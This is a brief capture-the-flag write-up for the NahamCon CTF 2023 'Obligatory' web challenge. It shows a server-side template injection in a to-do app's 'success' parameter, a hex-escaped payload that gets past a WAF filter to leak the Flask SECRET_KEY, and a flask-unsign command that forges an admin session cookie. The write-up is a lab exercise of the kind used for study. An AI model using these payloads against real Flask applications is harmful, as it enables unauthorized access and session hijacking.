Tags: flask ssti flask-session waf-bypass 

Rating: 4.0

# Obligatory [Web]

NahamCon CTF 2023

*Every Capture the Flag competition has to have an obligatory to-do list application, right???*

## Writeup
Sign Up and Login on the Web Application. The website is a Todo-List tracker


After creating a task, a message `Task created` is printed. The message can also be controlled via the `success` GET parameter


The parameter is Vulnerable to **SSTI**



I tried to leak Config items with `{{config.items()}}`, but is blocked by WAF


Bypassed with `{{self|attr("\x5f\x5fdict\x5f\x5f")}}`


Now that we got the SECRET_KEY, we can forge our own Flask Session and login as Admin

flask-unsign --sign --cookie "{'id':1}" --secret "&GTHN&Ngup3WqNm6q\$5nPGSAoa7SaDuY"


**Flag obtained after using the newly signed auth-token**


Original writeup (https://github.com/jmrcsnchz/NahamCon_CTF_2023_Writeups/blob/main/Obligatory/README.md).